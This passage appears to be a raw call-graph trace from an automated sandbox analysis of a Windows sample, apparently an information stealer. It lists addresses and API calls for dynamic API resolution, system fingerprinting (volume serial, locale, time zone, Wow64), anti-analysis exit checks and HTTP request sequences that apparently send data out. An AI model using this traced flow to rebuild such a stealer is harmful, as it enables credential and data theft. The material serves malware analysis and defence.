14213->14214 14215 7145c0 2 API calls 14214->14215 14216 7138ac 14215->14216 14217 7145c0 2 API calls 14216->14217 14218 7138c5 14217->14218 14219 7145c0 2 API calls 14218->14219 14220 7138de 14219->14220 14221 7145c0 2 API calls 14220->14221 14222 7138f7 14221->14222 14223 7145c0 2 API calls 14222->14223 14224 713910 14223->14224 14225 7145c0 2 API calls 14224->14225 14226 713929 14225->14226 14227 7145c0 2 API calls 14226->14227 14228 713942 14227->14228 14229 7145c0 2 API calls 14228->14229 14230 71395b 14229->14230 14231 7145c0 2 API calls 14230->14231 14232 713974 14231->14232 14233 7145c0 2 API calls 14232->14233 14234 71398d 14233->14234 14235 7145c0 2 API calls 14234->14235 14236 7139a6 14235->14236 14237 7145c0 2 API calls 14236->14237 14238 7139bf 14237->14238 14239 7145c0 2 API calls 14238->14239 14240 7139d8 14239->14240 14241 7145c0 2 API calls 14240->14241 14242 7139f1 14241->14242 14243 7145c0 2 API calls 14242->14243 14244 713a0a 14243->14244 14245 7145c0 2 API calls 14244->14245 14246 713a23 14245->14246 14247 7145c0 2 API calls 14246->14247 14248 713a3c 14247->14248 14249 7145c0 2 API calls 14248->14249 14250 713a55 14249->14250 14251 7145c0 2 API calls 14250->14251 14252 713a6e 14251->14252 14253 7145c0 2 API calls 14252->14253 14254 713a87 14253->14254 14255 7145c0 2 API calls 14254->14255 14256 713aa0 14255->14256 14257 7145c0 2 API calls 14256->14257 14258 713ab9 14257->14258 14259 7145c0 2 API calls 14258->14259 14260 713ad2 14259->14260 14261 7145c0 2 API calls 14260->14261 14262 713aeb 14261->14262 14263 7145c0 2 API calls 14262->14263 14264 713b04 14263->14264 14265 7145c0 2 API calls 14264->14265 14266 713b1d 14265->14266 14267 7145c0 2 API calls 14266->14267 14268 713b36 14267->14268 14269 7145c0 2 API calls 14268->14269 14270 713b4f 14269->14270 14271 7145c0 2 API calls 14270->14271 14272 713b68 14271->14272 14273 7145c0 2 API calls 14272->14273 14274 713b81 14273->14274 14275 7145c0 2 API calls 14274->14275 14276 713b9a 14275->14276 14277 7145c0 2 API calls 14276->14277 14278 713bb3 14277->14278 14279 7145c0 2 API calls 14278->14279 14280 713bcc 14279->14280 14281 7145c0 2 API calls 14280->14281 14282 713be5 14281->14282 14283 7145c0 2 API calls 14282->14283 14284 713bfe 14283->14284 14285 7145c0 2 API calls 14284->14285 14286 713c17 14285->14286 14287 7145c0 2 API calls 14286->14287 14288 713c30 14287->14288 14289 7145c0 2 API calls 14288->14289 14290 713c49 14289->14290 14291 7145c0 2 API calls 14290->14291 14292 713c62 14291->14292 14293 7145c0 2 API calls 14292->14293 14294 713c7b 14293->14294 14295 7145c0 2 API calls 14294->14295 14296 713c94 14295->14296 14297 7145c0 2 API calls 14296->14297 14298 713cad 14297->14298 14299 7145c0 2 API calls 14298->14299 14300 713cc6 14299->14300 14301 7145c0 2 API calls 14300->14301 14302 713cdf 14301->14302 14303 7145c0 2 API calls 14302->14303 14304 713cf8 14303->14304 14305 7145c0 2 API calls 14304->14305 14306 713d11 14305->14306 14307 7145c0 2 API calls 14306->14307 14308 713d2a 14307->14308 14309 7145c0 2 API calls 14308->14309 14310 713d43 14309->14310 14311 7145c0 2 API calls 14310->14311 14312 713d5c 14311->14312 14313 7145c0 2 API calls 14312->14313 14314 713d75 14313->14314 14315 7145c0 2 API calls 14314->14315 14316 713d8e 14315->14316 14317 7145c0 2 API calls 14316->14317 14318 713da7 14317->14318 14319 7145c0 2 API calls 14318->14319 14320 713dc0 14319->14320 14321 7145c0 2 API calls 14320->14321 14322 713dd9 14321->14322 14323 7145c0 2 API calls 14322->14323 14324 713df2 14323->14324 14325 7145c0 2 API calls 14324->14325 14326 713e0b 14325->14326 14327 7145c0 2 API calls 14326->14327 14328 713e24 14327->14328 14329 7145c0 2 API calls 14328->14329 14330 713e3d 14329->14330 14331 7145c0 2 API calls 14330->14331 14332 713e56 14331->14332 14333 7145c0 2 API calls 14332->14333 14334 713e6f 14333->14334 14335 7145c0 2 API calls 14334->14335 14336 713e88 14335->14336 14337 7145c0 2 API calls 14336->14337 14338 713ea1 14337->14338 14339 7145c0 2 API calls 14338->14339 14340 713eba 14339->14340 14341 7145c0 2 API calls 14340->14341 14342 713ed3 14341->14342 14343 7145c0 2 API calls 14342->14343 14344 713eec 14343->14344 14345 7145c0 2 API calls 14344->14345 14346 713f05 14345->14346 14347 7145c0 2 API calls 14346->14347 14348 713f1e 14347->14348 14349 7145c0 2 API calls 14348->14349 14350 713f37 14349->14350 14351 7145c0 2 API calls 14350->14351 14352 713f50 14351->14352 14353 7145c0 2 API calls 14352->14353 14354 713f69 14353->14354 14355 7145c0 2 API calls 14354->14355 14356 713f82 14355->14356 14357 7145c0 2 API calls 14356->14357 14358 713f9b 14357->14358 14359 7145c0 2 API calls 14358->14359 14360 713fb4 14359->14360 14361 7145c0 2 API calls 14360->14361 14362 713fcd 14361->14362 14363 7145c0 2 API calls 14362->14363 14364 713fe6 14363->14364 14365 7145c0 2 API calls 14364->14365 14366 713fff 14365->14366 14367 7145c0 2 API calls 14366->14367 14368 714018 14367->14368 14369 7145c0 2 API calls 14368->14369 14370 714031 14369->14370 14371 7145c0 2 API calls 14370->14371 14372 71404a 14371->14372 14373 7145c0 2 API calls 14372->14373 14374 714063 14373->14374 14375 7145c0 2 API calls 14374->14375 14376 71407c 14375->14376 14377 7145c0 2 API calls 14376->14377 14378 714095 14377->14378 14379 7145c0 2 API calls 14378->14379 14380 7140ae 14379->14380 14381 7145c0 2 API calls 14380->14381 14382 7140c7 14381->14382 14383 7145c0 2 API calls 14382->14383 14384 7140e0 14383->14384 14385 7145c0 2 API calls 14384->14385 14386 7140f9 14385->14386 14387 7145c0 2 API calls 14386->14387 14388 714112 14387->14388 14389 7145c0 2 API calls 14388->14389 14390 71412b 14389->14390 14391 7145c0 2 API calls 14390->14391 14392 714144 14391->14392 14393 7145c0 2 API calls 14392->14393 14394 71415d 14393->14394 14395 7145c0 2 API calls 14394->14395 14396 714176 14395->14396 14397 7145c0 2 API calls 14396->14397 14398 71418f 14397->14398 14399 7145c0 2 API calls 14398->14399 14400 7141a8 14399->14400 14401 7145c0 2 API calls 14400->14401 14402 7141c1 14401->14402 14403 7145c0 2 API calls 14402->14403 14404 7141da 14403->14404 14405 7145c0 2 API calls 14404->14405 14406 7141f3 14405->14406 14407 7145c0 2 API calls 14406->14407 14408 71420c 14407->14408 14409 7145c0 2 API calls 14408->14409 14410 714225 14409->14410 14411 7145c0 2 API calls 14410->14411 14412 71423e 14411->14412 14413 7145c0 2 API calls 14412->14413 14414 714257 14413->14414 14415 7145c0 2 API calls 14414->14415 14416 714270 14415->14416 14417 7145c0 2 API calls 14416->14417 14418 714289 14417->14418 14419 7145c0 2 API calls 14418->14419 14420 7142a2 14419->14420 14421 7145c0 2 API calls 14420->14421 14422 7142bb 14421->14422 14423 7145c0 2 API calls 14422->14423 14424 7142d4 14423->14424 14425 7145c0 2 API calls 14424->14425 14426 7142ed 14425->14426 14427 7145c0 2 API calls 14426->14427 14428 714306 14427->14428 14429 7145c0 2 API calls 14428->14429 14430 71431f 14429->14430 14431 7145c0 2 API calls 14430->14431 14432 714338 14431->14432 14433 7145c0 2 API calls 14432->14433 14434 714351 14433->14434 14435 7145c0 2 API calls 14434->14435 14436 71436a 14435->14436 14437 7145c0 2 API calls 14436->14437 14438 714383 14437->14438 14439 7145c0 2 API calls 14438->14439 14440 71439c 14439->14440 14441 7145c0 2 API calls 14440->14441 14442 7143b5 14441->14442 14443 7145c0 2 API calls 14442->14443 14444 7143ce 14443->14444 14445 7145c0 2 API calls 14444->14445 14446 7143e7 14445->14446 14447 7145c0 2 API calls 14446->14447 14448 714400 14447->14448 14449 7145c0 2 API calls 14448->14449 14450 714419 14449->14450 14451 7145c0 2 API calls 14450->14451 14452 714432 14451->14452 14453 7145c0 2 API calls 14452->14453 14454 71444b 14453->14454 14455 7145c0 2 API calls 14454->14455 14456 714464 14455->14456 14457 7145c0 2 API calls 14456->14457 14458 71447d 14457->14458 14459 7145c0 2 API calls 14458->14459 14460 714496 14459->14460 14461 7145c0 2 API calls 14460->14461 14462 7144af 14461->14462 14463 7145c0 2 API calls 14462->14463 14464 7144c8 14463->14464 14465 7145c0 2 API calls 14464->14465 14466 7144e1 14465->14466 14467 7145c0 2 API calls 14466->14467 14468 7144fa 14467->14468 14469 7145c0 2 API calls 14468->14469 14470 714513 14469->14470 14471 7145c0 2 API calls 14470->14471 14472 71452c 14471->14472 14473 7145c0 2 API calls 14472->14473 14474 714545 14473->14474 14475 7145c0 2 API calls 14474->14475 14476 71455e 14475->14476 14477 7145c0 2 API calls 14476->14477 14478 714577 14477->14478 14479 7145c0 2 API calls 14478->14479 14480 714590 14479->14480 14481 7145c0 2 API calls 14480->14481 14482 7145a9 14481->14482 14483 729c10 14482->14483 14484 729c20 43 API calls 14483->14484 14485 72a036 8 API calls 14483->14485 14484->14485 14486 72a146 14485->14486 14487 72a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14485->14487 14488 72a153 8 API calls 14486->14488 14489 72a216 14486->14489 14487->14486 14488->14489 14490 72a298 14489->14490 14491 72a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14489->14491 14492 72a337 14490->14492 14493 72a2a5 6 API calls 14490->14493 14491->14490 14494 72a344 9 API calls 14492->14494 14495 72a41f 14492->14495 14493->14492 14494->14495 14496 72a4a2 14495->14496 14497 72a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14495->14497 14498 72a4ab GetProcAddress GetProcAddress 14496->14498 14499 72a4dc 14496->14499 14497->14496 14498->14499 14500 72a515 14499->14500 14501 72a4e5 GetProcAddress GetProcAddress 14499->14501 14502 72a612 14500->14502 14503 72a522 10 API calls 14500->14503 14501->14500 14504 72a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14502->14504 14505 72a67d 14502->14505 14503->14502 14504->14505 14506 72a686 GetProcAddress 14505->14506 14507 72a69e 14505->14507 14506->14507 14508 72a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14507->14508 14509 725ca3 14507->14509 14508->14509 14510 711590 14509->14510 15631 711670 14510->15631 14513 72a7a0 lstrcpy 14514 7115b5 14513->14514 14515 72a7a0 lstrcpy 14514->14515 14516 7115c7 14515->14516 14517 72a7a0 lstrcpy 14516->14517 14518 7115d9 14517->14518 14519 72a7a0 lstrcpy 14518->14519 14520 711663 14519->14520 14521 725510 14520->14521 14522 725521 14521->14522 14523 72a820 2 API calls 14522->14523 14524 72552e 14523->14524 14525 72a820 2 API calls 14524->14525 14526 72553b 14525->14526 14527 72a820 2 API calls 14526->14527 14528 725548 14527->14528 14529 72a740 lstrcpy 14528->14529 14530 725555 14529->14530 14531 72a740 lstrcpy 14530->14531 14532 725562 14531->14532 14533 72a740 lstrcpy 14532->14533 14534 72556f 14533->14534 14535 72a740 lstrcpy 14534->14535 14570 72557c 14535->14570 14536 7252c0 25 API calls 14536->14570 14537 7251f0 20 API calls 14537->14570 14538 725643 StrCmpCA 14538->14570 14539 7256a0 StrCmpCA 14540 7257dc 14539->14540 14539->14570 14541 72a8a0 lstrcpy 14540->14541 14542 7257e8 14541->14542 14543 72a820 2 API calls 14542->14543 14546 7257f6 14543->14546 14544 72a740 lstrcpy 14544->14570 14545 72a820 lstrlen lstrcpy 14545->14570 14548 72a820 2 API calls 14546->14548 14547 725856 StrCmpCA 14549 725991 14547->14549 14547->14570 14552 725805 14548->14552 14551 72a8a0 lstrcpy 14549->14551 14550 72a8a0 lstrcpy 14550->14570 14553 72599d 14551->14553 14554 711670 lstrcpy 14552->14554 14555 72a820 2 API calls 14553->14555 14566 725811 14554->14566 14556 7259ab 14555->14556 14558 72a820 2 API calls 14556->14558 14557 725a0b StrCmpCA 14559 725a16 Sleep 14557->14559 14560 725a28 14557->14560 14561 7259ba 14558->14561 14559->14570 14562 72a8a0 lstrcpy 14560->14562 14563 711670 lstrcpy 14561->14563 14564 725a34 14562->14564 14563->14566 14567 72a820 2 API calls 14564->14567 14565 711590 lstrcpy 14565->14570 14566->13628 14568 725a43 14567->14568 14569 72a820 2 API calls 14568->14569 14571 725a52 14569->14571 14570->14536 14570->14537 14570->14538 14570->14539 14570->14544 14570->14545 14570->14547 14570->14550 14570->14557 14570->14565 14572 72578a StrCmpCA 14570->14572 14574 72593f StrCmpCA 14570->14574 14575 72a7a0 lstrcpy 14570->14575 14573 711670 lstrcpy 14571->14573 14572->14570 14573->14566 14574->14570 14575->14570 14577 727553 GetVolumeInformationA 14576->14577 14578 72754c 14576->14578 14579 727591 14577->14579 14578->14577 14580 7275fc GetProcessHeap RtlAllocateHeap 14579->14580 14581 727628 wsprintfA 14580->14581 14582 727619 14580->14582 14584 72a740 lstrcpy 14581->14584 14583 72a740 lstrcpy 14582->14583 14585 725da7 14583->14585 14584->14585 14585->13649 14587 72a7a0 lstrcpy 14586->14587 14588 714899 14587->14588 15640 7147b0 14588->15640 14590 7148a5 14591 72a740 lstrcpy 14590->14591 14592 7148d7 14591->14592 14593 72a740 lstrcpy 14592->14593 14594 7148e4 14593->14594 14595 72a740 lstrcpy 14594->14595 14596 7148f1 14595->14596 14597 72a740 lstrcpy 14596->14597 14598 7148fe 14597->14598 14599 72a740 lstrcpy 14598->14599 14600 71490b InternetOpenA StrCmpCA 14599->14600 14601 714944 14600->14601 14602 714ecb InternetCloseHandle 14601->14602 15646 728b60 14601->15646 14604 714ee8 14602->14604 15661 719ac0 CryptStringToBinaryA 14604->15661 14605 714963 15654 72a920 14605->15654 14608 714976 14610 72a8a0 lstrcpy 14608->14610 14615 71497f 14610->14615 14611 72a820 2 API calls 14612 714f05 14611->14612 14614 72a9b0 4 API calls 14612->14614 14613 714f27 ctype 14617 72a7a0 lstrcpy 14613->14617 14616 714f1b 14614->14616 14619 72a9b0 4 API calls 14615->14619 14618 72a8a0 lstrcpy 14616->14618 14630 714f57 14617->14630 14618->14613 14620 7149a9 14619->14620 14621 72a8a0 lstrcpy 14620->14621 14622 7149b2 14621->14622 14623 72a9b0 4 API calls 14622->14623 14624 7149d1 14623->14624 14625 72a8a0 lstrcpy 14624->14625 14626 7149da 14625->14626 14627 72a920 3 API calls 14626->14627 14628 7149f8 14627->14628 14629 72a8a0 lstrcpy 14628->14629 14631 714a01 14629->14631 14630->13652 14632 72a9b0 4 API calls 14631->14632 14633 714a20 14632->14633 14634 72a8a0 lstrcpy 14633->14634 14635 714a29 14634->14635 14636 72a9b0 4 API calls 14635->14636 14637 714a48 14636->14637 14638 72a8a0 lstrcpy 14637->14638 14639 714a51 14638->14639 14640 72a9b0 4 API calls 14639->14640 14641 714a7d 14640->14641 14642 72a920 3 API calls 14641->14642 14643 714a84 14642->14643 14644 72a8a0 lstrcpy 14643->14644 14645 714a8d 14644->14645 14646 714aa3 InternetConnectA 14645->14646 14646->14602 14647 714ad3 HttpOpenRequestA 14646->14647 14649 714b28 14647->14649 14650 714ebe InternetCloseHandle 14647->14650 14651 72a9b0 4 API calls 14649->14651 14650->14602 14652 714b3c 14651->14652 14653 72a8a0 lstrcpy 14652->14653 14654 714b45 14653->14654 14655 72a920 3 API calls 14654->14655 14656 714b63 14655->14656 14657 72a8a0 lstrcpy 14656->14657 14658 714b6c 14657->14658 14659 72a9b0 4 API calls 14658->14659 14660 714b8b 14659->14660 14661 72a8a0 lstrcpy 14660->14661 14662 714b94 14661->14662 14663 72a9b0 4 API calls 14662->14663 14664 714bb5 14663->14664 14665 72a8a0 lstrcpy 14664->14665 14666 714bbe 14665->14666 14667 72a9b0 4 API calls 14666->14667 14668 714bde 14667->14668 14669 72a8a0 lstrcpy 14668->14669 14670 714be7 14669->14670 14671 72a9b0 4 API calls 14670->14671 14672 714c06 14671->14672 14673 72a8a0 lstrcpy 14672->14673 14674 714c0f 14673->14674 14675 72a920 3 API calls 14674->14675 14676 714c2d 14675->14676 14677 72a8a0 lstrcpy 14676->14677 14678 714c36 14677->14678 14679 72a9b0 4 API calls 14678->14679 14680 714c55 14679->14680 14681 72a8a0 lstrcpy 14680->14681 14682 714c5e 14681->14682 14683 72a9b0 4 API calls 14682->14683 14684 714c7d 14683->14684 14685 72a8a0 lstrcpy 14684->14685 14686 714c86 14685->14686 14687 72a920 3 API calls 14686->14687 14688 714ca4 14687->14688 14689 72a8a0 lstrcpy 14688->14689 14690 714cad 14689->14690 14691 72a9b0 4 API calls 14690->14691 14692 714ccc 14691->14692 14693 72a8a0 lstrcpy 14692->14693 14694 714cd5 14693->14694 14695 72a9b0 4 API calls 14694->14695 14696 714cf6 14695->14696 14697 72a8a0 lstrcpy 14696->14697 14698 714cff 14697->14698 14699 72a9b0 4 API calls 14698->14699 14700 714d1f 14699->14700 14701 72a8a0 lstrcpy 14700->14701 14702 714d28 14701->14702 14703 72a9b0 4 API calls 14702->14703 14704 714d47 14703->14704 14705 72a8a0 lstrcpy 14704->14705 14706 714d50 14705->14706 14707 72a920 3 API calls 14706->14707 14708 714d6e 14707->14708 14709 72a8a0 lstrcpy 14708->14709 14710 714d77 14709->14710 14711 72a740 lstrcpy 14710->14711 14712 714d92 14711->14712 14713 72a920 3 API calls 14712->14713 14714 714db3 14713->14714 14715 72a920 3 API calls 14714->14715 14716 714dba 14715->14716 14717 72a8a0 lstrcpy 14716->14717 14718 714dc6 14717->14718 14719 714de7 lstrlen 14718->14719 14720 714dfa 14719->14720 14721 714e03 lstrlen 14720->14721 15660 72aad0 14721->15660 14723 714e13 HttpSendRequestA 14724 714e32 InternetReadFile 14723->14724 14725 714e67 InternetCloseHandle 14724->14725 14730 714e5e 14724->14730 14727 72a800 14725->14727 14727->14650 14728 72a9b0 4 API calls 14728->14730 14729 72a8a0 lstrcpy 14729->14730 14730->14724 14730->14725 14730->14728 14730->14729 15667 72aad0 14731->15667 14733 7217c4 StrCmpCA 14734 7217cf ExitProcess 14733->14734 14741 7217d7 14733->14741 14735 7219c2 14735->13654 14736 721932 StrCmpCA 14736->14741 14737 721913 StrCmpCA 14737->14741 14738 721970 StrCmpCA 14738->14741 14739 7218f1 StrCmpCA 14739->14741 14740 721951 StrCmpCA 14740->14741 14741->14735 14741->14736 14741->14737 14741->14738 14741->14739 14741->14740 14742 72187f StrCmpCA 14741->14742 14743 72185d StrCmpCA 14741->14743 14744 7218cf StrCmpCA 14741->14744 14745 7218ad StrCmpCA 14741->14745 14746 72a820 lstrlen lstrcpy 14741->14746 14742->14741 14743->14741 14744->14741 14745->14741 14746->14741 14748 72a7a0 lstrcpy 14747->14748 14749 715979 14748->14749 14750 7147b0 2 API calls 14749->14750 14751 715985 14750->14751 14752 72a740 lstrcpy 14751->14752 14753 7159ba 14752->14753 14754 72a740 lstrcpy 14753->14754 14755 7159c7 14754->14755 14756 72a740 lstrcpy 14755->14756 14757 7159d4 14756->14757 14758 72a740 lstrcpy 14757->14758 14759 7159e1 14758->14759 14760 72a740 lstrcpy 14759->14760 14761 7159ee InternetOpenA StrCmpCA 14760->14761 14762 715a1d 14761->14762 14763 715fc3 InternetCloseHandle 14762->14763 14764 728b60 3 API calls 14762->14764 14765 715fe0 14763->14765 14766 715a3c 14764->14766 14768 719ac0 4 API calls 14765->14768 14767 72a920 3 API calls 14766->14767 14769 715a4f 14767->14769 14770 715fe6 14768->14770 14771 72a8a0 lstrcpy 14769->14771 14772 72a820 2 API calls 14770->14772 14774 71601f ctype 14770->14774 14776 715a58 14771->14776 14773 715ffd 14772->14773 14775 72a9b0 4 API calls 14773->14775 14778 72a7a0 lstrcpy 14774->14778 14777 716013 14775->14777 14780 72a9b0 4 API calls 14776->14780 14779 72a8a0 lstrcpy 14777->14779 14788 71604f 14778->14788 14779->14774 14781 715a82 14780->14781 14782 72a8a0 lstrcpy 14781->14782 14783 715a8b 14782->14783 14784 72a9b0 4 API calls 14783->14784 14785 715aaa 14784->14785 14786 72a8a0 lstrcpy 14785->14786 14787 715ab3 14786->14787 14789 72a920 3 API calls 14787->14789 14788->13660 14790 715ad1 14789->14790 14791 72a8a0 lstrcpy 14790->14791 14792 715ada 14791->14792 14793 72a9b0 4 API calls 14792->14793 14794 715af9 14793->14794 14795 72a8a0 lstrcpy 14794->14795 14796 715b02 14795->14796 14797 72a9b0 4 API calls 14796->14797 14798 715b21 14797->14798 14799 72a8a0 lstrcpy 14798->14799 14800 715b2a 14799->14800 14801 72a9b0 4 API calls 14800->14801 14802 715b56 14801->14802 14803 72a920 3 API calls 14802->14803 14804 715b5d 14803->14804 14805 72a8a0 lstrcpy 14804->14805 14806 715b66 14805->14806 14807 715b7c InternetConnectA 14806->14807 14807->14763 14808 715bac HttpOpenRequestA 14807->14808 14810 715fb6 InternetCloseHandle 14808->14810 14811 715c0b 14808->14811 14810->14763 14812 72a9b0 4 API calls 14811->14812 14813 715c1f 14812->14813 14814 72a8a0 lstrcpy 14813->14814 14815 715c28 14814->14815 14816 72a920 3 API calls 14815->14816 14817 715c46 14816->14817 14818 72a8a0 lstrcpy 14817->14818 14819 715c4f 14818->14819 14820 72a9b0 4 API calls 14819->14820 14821 715c6e 14820->14821 14822 72a8a0 lstrcpy 14821->14822 14823 715c77 14822->14823 14824 72a9b0 4 API calls 14823->14824 14825 715c98 14824->14825 14826 72a8a0 lstrcpy 14825->14826 14827 715ca1 14826->14827 14828 72a9b0 4 API calls 14827->14828 14829 715cc1 14828->14829 14830 72a8a0 lstrcpy 14829->14830 14831 715cca 14830->14831 14832 72a9b0 4 API calls 14831->14832 14833 715ce9 14832->14833 14834 72a8a0 lstrcpy 14833->14834 14835 715cf2 14834->14835 14836 72a920 3 API calls 14835->14836 14837 715d10 14836->14837 14838 72a8a0 lstrcpy 14837->14838 14839 715d19 14838->14839 14840 72a9b0 4 API calls 14839->14840 14841 715d38 14840->14841 14842 72a8a0 lstrcpy 14841->14842 14843 715d41 14842->14843 14844 72a9b0 4 API calls 14843->14844 14845 715d60 14844->14845 14846 72a8a0 lstrcpy 14845->14846 14847 715d69 14846->14847 14848 72a920 3 API calls 14847->14848 14849 715d87 14848->14849 14850 72a8a0 lstrcpy 14849->14850 14851 715d90 14850->14851 14852 72a9b0 4 API calls 14851->14852 14853 715daf 14852->14853 14854 72a8a0 lstrcpy 14853->14854 14855 715db8 14854->14855 14856 72a9b0 4 API calls 14855->14856 14857 715dd9 14856->14857 14858 72a8a0 lstrcpy 14857->14858 14859 715de2 14858->14859 14860 72a9b0 4 API calls 14859->14860 14861 715e02 14860->14861 14862 72a8a0 lstrcpy 14861->14862 14863 715e0b 14862->14863 14864 72a9b0 4 API calls 14863->14864 14865 715e2a 14864->14865 14866 72a8a0 lstrcpy 14865->14866 14867 715e33 14866->14867 14868 72a920 3 API calls 14867->14868 14869 715e54 14868->14869 14870 72a8a0 lstrcpy 14869->14870 14871 715e5d 14870->14871 14872 715e70 lstrlen 14871->14872 15668 72aad0 14872->15668 14874 715e81 lstrlen GetProcessHeap RtlAllocateHeap 15669 72aad0 14874->15669 14876 715eae lstrlen 14877 715ebe 14876->14877 14878 715ed7 lstrlen 14877->14878 14879 715ee7 14878->14879 14880 715ef0 lstrlen 14879->14880 14881 715f04 14880->14881 14882 715f1a lstrlen 14881->14882 15670 72aad0 14882->15670 14884 715f2a HttpSendRequestA 14885 715f35 InternetReadFile 14884->14885 14886 715f6a InternetCloseHandle 14885->14886 14890 715f61 14885->14890 14886->14810 14888 72a9b0 4 API calls 14888->14890 14889 72a8a0 lstrcpy 14889->14890 14890->14885 14890->14886 14890->14888 14890->14889 14893 721077 14891->14893 14892 721151 14892->13662 14893->14892 14894 72a820 lstrlen lstrcpy 14893->14894 14894->14893 14900 720db7 14895->14900 14896 720f17 14896->13670 14897 720e27 StrCmpCA 14897->14900 14898 720e67 StrCmpCA 14898->14900 14899 720ea4 StrCmpCA 14899->14900 14900->14896 14900->14897 14900->14898 14900->14899 14901 72a820 lstrlen lstrcpy 14900->14901 14901->14900 14906 720f67 14902->14906 14903 721044 14903->13678 14904 720fb2 StrCmpCA 14904->14906 14905 72a820 lstrlen lstrcpy 14905->14906 14906->14903 14906->14904 14906->14905 14908 72a740 lstrcpy 14907->14908 14909 721a26 14908->14909 14910 72a9b0 4 API calls 14909->14910 14911 721a37 14910->14911 14912 72a8a0 lstrcpy 14911->14912 14913 721a40 14912->14913 14914 72a9b0 4 API calls 14913->14914 14915 721a5b 14914->14915 14916 72a8a0 lstrcpy 14915->14916 14917 721a64 14916->14917 14918 72a9b0 4 API calls 14917->14918 14919 721a7d 14918->14919 14920 72a8a0 lstrcpy 14919->14920 14921 721a86 14920->14921 14922 72a9b0 4 API calls 14921->14922 14923 721aa1 14922->14923 14924 72a8a0 lstrcpy 14923->14924 14925 721aaa 14924->14925 14926 72a9b0 4 API calls 14925->14926 14927 721ac3 14926->14927 14928 72a8a0 lstrcpy 14927->14928 14929 721acc 14928->14929 14930 72a9b0 4 API calls 14929->14930 14931 721ae7 14930->14931 14932 72a8a0 lstrcpy 14931->14932 14933 721af0 14932->14933 14934 72a9b0 4 API calls 14933->14934 14935 721b09 14934->14935 14936 72a8a0 lstrcpy 14935->14936 14937 721b12 14936->14937 14938 72a9b0 4 API calls 14937->14938 14939 721b2d 14938->14939 14940 72a8a0 lstrcpy 14939->14940 14941 721b36 14940->14941 14942 72a9b0 4 API calls 14941->14942 14943 721b4f 14942->14943 14944 72a8a0 lstrcpy 14943->14944 14945 721b58 14944->14945 14946 72a9b0 4 API calls 14945->14946 14947 721b76 14946->14947 14948 72a8a0 lstrcpy 14947->14948 14949 721b7f 14948->14949 14950 727500 6 API calls 14949->14950 14951 721b96 14950->14951 14952 72a920 3 API calls 14951->14952 14953 721ba9 14952->14953 14954 72a8a0 lstrcpy 14953->14954 14955 721bb2 14954->14955 14956 72a9b0 4 API calls 14955->14956 14957 721bdc 14956->14957 14958 72a8a0 lstrcpy 14957->14958 14959 721be5 14958->14959 14960 72a9b0 4 API calls 14959->14960 14961 721c05 14960->14961 14962 72a8a0 lstrcpy 14961->14962 14963 721c0e 14962->14963 15671 727690 GetProcessHeap RtlAllocateHeap 14963->15671 14966 72a9b0 4 API calls 14967 721c2e 14966->14967 14968 72a8a0 lstrcpy 14967->14968 14969 721c37 14968->14969 14970 72a9b0 4 API calls 14969->14970 14971 721c56 14970->14971 14972 72a8a0 lstrcpy 14971->14972 14973 721c5f 14972->14973 14974 72a9b0 4 API calls 14973->14974 14975 721c80 14974->14975 14976 72a8a0 lstrcpy 14975->14976 14977 721c89 14976->14977 15678 7277c0 GetCurrentProcess IsWow64Process 14977->15678 14980 72a9b0 4 API calls 14981 721ca9 14980->14981 14982 72a8a0 lstrcpy 14981->14982 14983 721cb2 14982->14983 14984 72a9b0 4 API calls 14983->14984 14985 721cd1 14984->14985 14986 72a8a0 lstrcpy 14985->14986 14987 721cda 14986->14987 14988 72a9b0 4 API calls 14987->14988 14989 721cfb 14988->14989 14990 72a8a0 lstrcpy 14989->14990 14991 721d04 14990->14991 14992 727850 3 API calls 14991->14992 14993 721d14 14992->14993 14994 72a9b0 4 API calls 14993->14994 14995 721d24 14994->14995 14996 72a8a0 lstrcpy 14995->14996 14997 721d2d 14996->14997 14998 72a9b0 4 API calls 14997->14998 14999 721d4c 14998->14999 15000 72a8a0 lstrcpy 14999->15000 15001 721d55 15000->15001 15002 72a9b0 4 API calls 15001->15002 15003 721d75 15002->15003 15004 72a8a0 lstrcpy 15003->15004 15005 721d7e 15004->15005 15006 7278e0 3 API calls 15005->15006 15007 721d8e 15006->15007 15008 72a9b0 4 API calls 15007->15008 15009 721d9e 15008->15009 15010 72a8a0 lstrcpy 15009->15010 15011 721da7 15010->15011 15012 72a9b0 4 API calls 15011->15012 15013 721dc6 15012->15013 15014 72a8a0 lstrcpy 15013->15014 15015 721dcf 15014->15015 15016 72a9b0 4 API calls 15015->15016 15017 721df0 15016->15017 15018 72a8a0 lstrcpy 15017->15018 15019 721df9 15018->15019 15680 727980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15019->15680 15022 72a9b0 4 API calls 15023 721e19 15022->15023 15024 72a8a0 lstrcpy 15023->15024 15025 721e22 15024->15025 15026 72a9b0 4 API calls 15025->15026 15027 721e41 15026->15027 15028 72a8a0 lstrcpy 15027->15028 15029 721e4a 15028->15029 15030 72a9b0 4 API calls 15029->15030 15031 721e6b 15030->15031 15032 72a8a0 lstrcpy 15031->15032 15033 721e74 15032->15033 15682 727a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15033->15682 15036 72a9b0 4 API calls 15037 721e94 15036->15037 15038 72a8a0 lstrcpy 15037->15038 15039 721e9d 15038->15039 15040 72a9b0 4 API calls 15039->15040 15041 721ebc 15040->15041 15042 72a8a0 lstrcpy 15041->15042 15043 721ec5 15042->15043 15044 72a9b0 4 API calls 15043->15044 15045 721ee5 15044->15045 15046 72a8a0 lstrcpy 15045->15046 15047 721eee 15046->15047 15685 727b00 GetUserDefaultLocaleName 15047->15685 15050 72a9b0 4 API calls 15051 721f0e 15050->15051 15052 72a8a0 lstrcpy 15051->15052 15053 721f17 15052->15053 15054 72a9b0 4 API calls 15053->15054 15055 721f36 15054->15055 15056 72a8a0 lstrcpy 15055->15056 15057 721f3f 15056->15057 15058 72a9b0 4 API calls 15057->15058 15059 721f60 15058->15059 15060 72a8a0 lstrcpy 15059->15060 15061 721f69 15060->15061 15689 727b90 15061->15689 15063 721f80 15064 72a920 3 API calls 15063->15064 15065 721f93 15064->15065 15066 72a8a0 lstrcpy 15065->15066 15067 721f9c 15066->15067 15068 72a9b0 4 API calls 15067->15068 15069 721fc6 15068->15069 15070 72a8a0 lstrcpy 15069->15070 15071 721fcf 15070->15071 15072 72a9b0 4 API calls 